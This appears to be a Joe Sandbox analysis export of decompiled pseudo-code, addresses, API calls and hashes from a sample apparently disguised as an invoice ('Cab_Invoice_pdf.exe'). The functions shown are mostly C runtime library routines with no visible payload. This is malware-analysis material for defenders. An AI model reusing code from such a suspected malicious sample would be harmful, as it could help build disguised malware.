								"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = 2;
								_t83 = 0;
								 *((char*)(_t121 - 0x19)) = 0;
							}
						}
						 *(_t121 - 4) = 0xfffffffe;
						E6E2F445F();
						if(_t83 != 0) {
							goto L11;
						} else {
							_t119 = E6E2F4E23();
							if( *_t119 != 0) {
								_push(_t119);
								if(E6E2F4CE5() != 0) {
									 *0x6e2f6134( *((intOrPtr*)(_t121 + 8)), 2,  *(_t121 + 0xc));
									 *((intOrPtr*)( *_t119))();
								}
							}
							 *0x6e3f8a48 =  *0x6e3f8a48 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
						return _t44;
					}
				}
			}






















                            0x6e2f437c
                            0x6e2f437c
                            0x6e2f4383
                            0x6e2f438a
                            0x6e2f438f
                            0x6e2f4392
                            0x6e2f4469
                            0x6e2f4469
                            0x6e2f4469
                            0x00000000
                            0x6e2f4398
                            0x6e2f439d
                            0x6e2f43a0
                            0x6e2f43a2
                            0x6e2f43a5
                            0x6e2f43a9
                            0x6e2f43b0
                            0x6e2f447d
                            0x6e2f4482
                            0x6e2f448a
                            0x6e2f448f
                            0x6e2f4494
                            0x6e2f4496
                            0x6e2f449d
                            0x6e2f44a5
                            0x6e2f44a8
                            0x6e2f44b1
                            0x6e2f44b4
                            0x6e2f44b7
                            0x6e2f44be
                            0x6e2f452d
                            0x6e2f4532
                            0x6e2f453a
                            0x6e2f453f
                            0x6e2f4542
                            0x6e2f4544
                            0x6e2f4555
                            0x6e2f4555
                            0x6e2f4559
                            0x6e2f455c
                            0x6e2f4568
                            0x6e2f4568
                            0x6e2f4575
                            0x6e2f4577
                            0x6e2f457a
                            0x6e2f457c
                            0x6e2f458c
                            0x6e2f458e
                            0x6e2f4591
                            0x6e2f4593
                            0x00000000
                            0x00000000
                            0x6e2f4593
                            0x6e2f455e
                            0x6e2f455e
                            0x6e2f4561
                            0x00000000
                            0x6e2f4563
                            0x6e2f4563
                            0x6e2f4599
                            0x6e2f4599
                            0x6e2f45a3
                            0x6e2f45a5
                            0x6e2f45a8
                            0x6e2f45ab
                            0x6e2f45ad
                            0x6e2f45af
                            0x6e2f45b1
                            0x6e2f45b6
                            0x6e2f45bb
                            0x6e2f45bd
                            0x6e2f45bd
                            0x6e2f45c3
                            0x6e2f45c4
                            0x6e2f45c9
                            0x6e2f45cf
                            0x6e2f45cf
                            0x6e2f45af
                            0x6e2f45d4
                            0x6e2f45d6
                            0x6e2f45dd
                            0x6e2f45e7
                            0x6e2f45e9
                            0x6e2f45ec
                            0x6e2f45ee
                            0x6e2f45fa
                            0x6e2f4622
                            0x6e2f4622
                            0x6e2f45d8
                            0x6e2f45d8
                            0x6e2f45db
                            0x00000000
                            0x00000000
                            0x6e2f45db
                            0x6e2f45d6
                            0x6e2f4561
                            0x6e2f4625
                            0x6e2f462c
                            0x6e2f4546
                            0x6e2f4546
                            0x6e2f454c
                            0x00000000
                            0x6e2f454e
                            0x6e2f454e
                            0x6e2f454e
                            0x6e2f454c
                            0x6e2f4631
                            0x6e2f463d
                            0x6e2f44c0
                            0x6e2f44c5
                            0x6e2f44ca
                            0x6e2f44cf
                            0x6e2f44d6
                            0x6e2f44da
                            0x6e2f44e4
                            0x6e2f44f0
                            0x6e2f44f2
                            0x6e2f44f2
                            0x6e2f44f4
                            0x6e2f44f7
                            0x6e2f44fe
                            0x6e2f4503
                            0x00000000
                            0x6e2f4503
                            0x6e2f4498
                            0x6e2f4498
                            0x6e2f4505
                            0x6e2f4508
                            0x6e2f4514
                            0x6e2f4514
                            0x6e2f43b6
                            0x6e2f43b6
                            0x6e2f43c7
                            0x6e2f43ce
                            0x6e2f43d3
                            0x6e2f43d8
                            0x6e2f43e2
                            0x6e2f43e8
                            0x6e2f43eb
                            0x6e2f43f6
                            0x6e2f43fb
                            0x6e2f4400
                            0x6e2f4407
                            0x6e2f4411
                            0x6e2f4413
                            0x6e2f4413
                            0x6e2f43eb
                            0x6e2f4416
                            0x6e2f441d
                            0x6e2f4424
                            0x00000000
                            0x6e2f4426
                            0x6e2f442b
                            0x6e2f4430
                            0x6e2f4432
                            0x6e2f443b
                            0x6e2f4449
                            0x6e2f444f
                            0x6e2f444f
                            0x6e2f443b
                            0x6e2f4451
                            0x6e2f4459
                            0x6e2f4459
                            0x6e2f446b
                            0x6e2f446e
                            0x6e2f447a
                            0x6e2f447a
                            0x6e2f43b0

                            APIs
                            • __RTC_Initialize.LIBCMT ref: 6E2F43C9
                              • Part of subcall function 6E2F4A5E: InitializeSListHead.KERNEL32(6E3F8D70,6E2F43D3,6E3F75E0,00000010,6E2F4364,?,?,?,6E2F458C,?,00000001,?,?,00000001,?,6E3F7628), ref: 6E2F4A63
                            • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6E2F6144,6E2F6148,6E3F75E0,00000010,6E2F4364,?,?,?,6E2F458C,?,00000001,?,?,00000001,?,6E3F7628), ref: 6E2F43E2
                            • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6E2F613C,6E2F6140,6E3F75E0,00000010,6E2F4364,?,?,?,6E2F458C,?,00000001,?,?,00000001,?,6E3F7628), ref: 6E2F4400
                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2F4433
                            • ___scrt_fastfail.LIBCMT ref: 6E2F447D
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                            • String ID:
                            • API String ID: 3966955261-0
                            • Opcode ID: cce941fa78df43f880550f30ce53ad22faff2b9c0c70a7b8b1fd5fd4205965e5
                            • Instruction ID: 3b228a6d86251e060c4ddf1d2fe3f738722df2211e248ab10ccb643d02b5ee85
                            • Opcode Fuzzy Hash: cce941fa78df43f880550f30ce53ad22faff2b9c0c70a7b8b1fd5fd4205965e5
                            • Instruction Fuzzy Hash: 5F21CD3AAC420EDBDF009BF496207DDF7AB9F5222AF144819D4526B282DFE14043D665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327C60, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E01327C60() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E01327C29(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E01320A25(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E013209EB(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                            0x01327c6f
                            0x01327c75
                            0x01327ccd
                            0x01327ccd
                            0x01327c77
                            0x01327c78
                            0x01327c7d
                            0x01327c86
                            0x01327c8c
                            0x01327c92
                            0x01327c97
                            0x00000000
                            0x01327c99
                            0x01327c9f
                            0x01327ca4
                            0x01327cc2
                            0x01327cbc
                            0x01327cbc
                            0x01327cbe
                            0x01327cbe
                            0x01327cc5
                            0x01327cca
                            0x01327c97
                            0x01327cd1
                            0x01327cd4
                            0x01327cd4
                            0x01327ce2

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01327C69
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01327C8C
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01327CB2
                            • _free.LIBCMT ref: 01327CC5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01327CD4
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: 1d4dc60c36fd934cfeeda0e8cd01b365105eb486c028fb268a0edd87aaca5802
                            • Instruction ID: df37e526d0434a0cd369ce64ff282b53be1677698fa0949e87314868d07fd239
                            • Opcode Fuzzy Hash: 1d4dc60c36fd934cfeeda0e8cd01b365105eb486c028fb268a0edd87aaca5802
                            • Instruction Fuzzy Hash: DC0184726012397FFB25767A5D88C7F7D6DFED2EA8714012DFA04C3204DA608C0182B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013244A9, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 81%
                            			E013244A9(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x133c238; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E01320B10(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E01323862(_t13, __eflags,  *0x133c238, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E01324297(_t13, _t15, 0x13463f0);
							E013209EB(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E013209EB();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0132380C(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                            0x013244a9
                            0x013244b4
                            0x013244b6
                            0x013244b8
                            0x013244bd
                            0x013244c0
                            0x013244ce
                            0x013244da
                            0x013244dd
                            0x013244e0
                            0x013244f2
                            0x013244f7
                            0x013244f9
                            0x01324504
                            0x0132450a
                            0x01324512
                            0x01324514
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244fb
                            0x013244fb
                            0x00000000
                            0x013244fb
                            0x013244e2
                            0x013244e2
                            0x013244e3
                            0x013244e3
                            0x01324516
                            0x01324517
                            0x01324517
                            0x013244c2
                            0x013244c8
                            0x013244cc
                            0x0132451f
                            0x01324520
                            0x01324526
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244cc
                            0x0132452d

                            APIs
                            • GetLastError.KERNEL32(?,?,?,0131C9D3,01320B62,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 013244AE
                            • _free.LIBCMT ref: 013244E3
                            • _free.LIBCMT ref: 0132450A
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324517
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324520
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 33da1ada3be81f45ddc4d0d75b96493c7aed9c06dfc422aaec99d16710cb06ad
                            • Instruction ID: e2ee204e82f04d08dde2e9175464667eb0a54b2a2cb2e8f7cc3d7b8f2265c890
                            • Opcode Fuzzy Hash: 33da1ada3be81f45ddc4d0d75b96493c7aed9c06dfc422aaec99d16710cb06ad
                            • Instruction Fuzzy Hash: BE017833200732A7C227763D5C48E2B26AEDFC1A7CF300126F90AF3541EF60C8058261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327E7E, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01327E7E(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x133c838; // 0x133c830
					if(_t23 != 0) {
						E013209EB(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x133c83c; // 0x1346555
					if(_t24 != 0) {
						E013209EB(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x133c840; // 0x1346555
					if(_t25 != 0) {
						E013209EB(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x133c868; // 0x133c834
					if(_t26 != 0) {
						E013209EB(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x133c86c; // 0x1346558
					if(_t27 != 0) {
						return E013209EB(_t6);
					}
				}
				return _t6;
			}










                            0x01327e84
                            0x01327e89
                            0x01327e8d
                            0x01327e93
                            0x01327e96
                            0x01327e9b
                            0x01327e9f
                            0x01327ea5
                            0x01327ea8
                            0x01327ead
                            0x01327eb1
                            0x01327eb7
                            0x01327eba
                            0x01327ebf
                            0x01327ec3
                            0x01327ec9
                            0x01327ecc
                            0x01327ed1
                            0x01327ed2
                            0x01327ed5
                            0x01327edb
                            0x00000000
                            0x01327ee3
                            0x01327edb
                            0x01327ee6

                            APIs
                            • _free.LIBCMT ref: 01327E96
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327EA8
                            • _free.LIBCMT ref: 01327EBA
                            • _free.LIBCMT ref: 01327ECC
                            • _free.LIBCMT ref: 01327EDE
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 8ff0f46a05a932df378159efa820dbda946f25f689ef394419409ab501b74325
                            • Instruction ID: 9f0fc0fffab5b5df90b5786edacd0b08afae64de6f7a1e93bcd8a6d61d340e75
                            • Opcode Fuzzy Hash: 8ff0f46a05a932df378159efa820dbda946f25f689ef394419409ab501b74325
                            • Instruction Fuzzy Hash: 53F0FF32604224ABE624FB5DE482C1B7BEDBA14B28B641807F14DEB514C730FC8087A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320833, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E01320833(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x133c828; // 0xe4f420
					if(_t7 != 0x133c608) {
						E013209EB(_t7);
						 *0x133c828 = 0x133c608;
					}
				}
				E013209EB( *0x134630c);
				 *0x134630c = 0;
				E013209EB( *0x1346310);
				 *0x1346310 = 0;
				E013209EB( *0x1345e70);
				 *0x1345e70 = 0;
				E013209EB( *0x1345e74);
				 *0x1345e74 = 0;
				return 1;
			}




                            0x0132083c
                            0x01320840
                            0x01320842
                            0x0132084e
                            0x01320851
                            0x01320857
                            0x01320857
                            0x0132084e
                            0x01320863
                            0x01320870
                            0x01320876
                            0x01320881
                            0x01320887
                            0x01320892
                            0x01320898
                            0x013208a0
                            0x013208a9

                            APIs
                            • _free.LIBCMT ref: 01320851
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01320863
                            • _free.LIBCMT ref: 01320876
                            • _free.LIBCMT ref: 01320887
                            • _free.LIBCMT ref: 01320898
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 8d51565b6e71a9b63e906f92e2115f17098569f088477cda5a05da5642646419
                            • Instruction ID: d7d16b544a83020e4f203888848185fe598873af0cdd4b14f7f71a749fd32dbb
                            • Opcode Fuzzy Hash: 8d51565b6e71a9b63e906f92e2115f17098569f088477cda5a05da5642646419
                            • Instruction Fuzzy Hash: E9F030BA9012318BDA357F69F40284A3FE8E719B34B015A07F41566268CF762D458FC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131F756, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E0131F756(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x1345eb0, 0x104);
					_t48 =  *0x1345e7c; // 0xe41c92
					 *0x1345e80 = 0x1345eb0;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x1345eb0;
					}
					_v8 = 0;
					_v16 = 0;
					E0131F875(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0131F9FB(_v8, _v16, 2);
					if(_t61 != 0) {
						E0131F875(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E01327493(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x1345e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x1345e74 = _t56;
									L16:
									E013209EB(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x1345e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x1345e74 = _t42;
						goto L10;
					} else {
						_t43 = E0131C9CE();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E013209EB(_t61);
						return _t49;
					}
				} else {
					_t44 = E0131C9CE();
					_t62 = 0x16;
					 *_t44 = _t62;
					E01321788();
					return _t62;
				}
			}

















                            0x0131f763
                            0x0131f791
                            0x0131f797
                            0x0131f79d
                            0x0131f7a5
                            0x0131f7ac
                            0x0131f7ac
                            0x0131f7b1
                            0x0131f7b8
                            0x0131f7bf
                            0x0131f7d1
                            0x0131f7d8
                            0x0131f7f7
                            0x0131f803
                            0x0131f81e
                            0x0131f821
                            0x0131f828
                            0x0131f82e
                            0x0131f835
                            0x0131f838
                            0x0131f83a
                            0x0131f83e
                            0x0131f848
                            0x0131f848
                            0x0131f84a
                            0x0131f850
                            0x0131f853
                            0x0131f855
                            0x0131f85b
                            0x0131f85c
                            0x0131f862
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131f840
                            0x0131f840
                            0x0131f840
                            0x0131f843
                            0x0131f844
                            0x00000000
                            0x0131f840
                            0x0131f830
                            0x00000000
                            0x0131f830
                            0x0131f809
                            0x0131f80e
                            0x0131f810
                            0x0131f812
                            0x00000000
                            0x0131f7da
                            0x0131f7da
                            0x0131f7df
                            0x0131f7e1
                            0x0131f7e2
                            0x0131f817
                            0x0131f817
                            0x0131f865
                            0x0131f866
                            0x00000000
                            0x0131f86f
                            0x0131f76b
                            0x0131f76b
                            0x0131f772
                            0x0131f773
                            0x0131f775
                            0x00000000
                            0x0131f77a

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cab_Invoice_pdf.exe,00000104), ref: 0131F791
                            • _free.LIBCMT ref: 0131F85C
                            • _free.LIBCMT ref: 0131F866
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                            • API String ID: 2506810119-125003824
                            • Opcode ID: b9c86bf1d353686b29704739bb1349c729c68e19cdb06b7a28b8967f91f834ee
                            • Instruction ID: 5ec9d2aefa12972e1298bd1f9c83a26dea9c491dbc337891cb509af0698c1db8
                            • Opcode Fuzzy Hash: b9c86bf1d353686b29704739bb1349c729c68e19cdb06b7a28b8967f91f834ee
                            • Instruction Fuzzy Hash: B2318075E00229EFDB39DF9DD88099EBFFCEB85714B144166E90897204D6B09E45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131F193, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E0131F193(void* __ecx, char* _a4, char** _a8) {
				char* _v8;
				intOrPtr _v12;
				signed short* _v36;
				void* _t14;
				void* _t15;
				char** _t16;
				char* _t20;
				void* _t27;
				signed int* _t28;
				signed int* _t32;
				void* _t39;
				void* _t52;
				signed int _t57;
				signed short* _t58;
				intOrPtr _t59;
				char* _t61;
				char* _t62;
				signed int _t64;
				signed int* _t66;
				char* _t68;
				signed short* _t70;

				_t39 = __ecx;
				_push(__ecx);
				_v8 = 0;
				_t14 = E01326CA2( &_v8, 0, L"TMP");
				if(_t14 == 0) {
					_t68 = _v8;
					_t61 = _t68;
					if(_t68 == 0) {
						goto L10;
					} else {
						_t20 = E01326D40(_t68, 0);
						if(_t20 != 0) {
							_push(_t61);
							L19();
							_t61 = _t20;
							if(_t61 == 0 || E01326D40(_t61, 0) != 0) {
								E013209EB(_t61);
								goto L10;
							} else {
								 *_a8 = _t61;
								E013209EB(0);
							}
						} else {
							_t68 = 0;
							 *_a8 = _t61;
						}
					}
					goto L17;
				} else {
					if(_t14 == 0x16) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E01321798();
						asm("int3");
						_push(_t39);
						_push(0);
						_push(_t67);
						_t70 = _v36;
						_push(_t60);
						_t52 = 0;
						_t27 = 0;
						_t58 = _t70;
						_t64 =  *_t70 & 0x0000ffff;
						if(_t64 == 0) {
							L34:
							_t28 = 0;
						} else {
							_v12 = 0x22;
							do {
								if(_t64 == _v12) {
									_t52 = _t52 + 1;
								}
								_t58 =  &(_t58[1]);
								_t27 = _t27 + 1;
								_t64 =  *_t58 & 0x0000ffff;
							} while (_t64 != 0);
							if(_t52 == 0) {
								goto L34;
							} else {
								_t66 = E01320B10(_t52, _t27 - _t52 + 1, 2);
								if(_t66 != 0) {
									_t32 = _t66;
									if( *_t70 != 0) {
										_t59 = _v12;
										do {
											_t57 =  *_t70 & 0x0000ffff;
											if(_t57 != _t59) {
												 *_t32 = _t57;
												_t32 =  &(_t32[0]);
											}
											_t70 =  &(_t70[1]);
										} while ( *_t70 != 0);
									}
									 *_t32 = 0;
								} else {
									_t66 = 0;
								}
								E013209EB(0);
								_t28 = _t66;
							}
						}
						return _t28;
					} else {
						_t68 = 0;
						L10:
						_t62 = _a4;
						if(_t62 == 0 || E01326D40(_t62, 0) != 0) {
							_t62 = "\\";
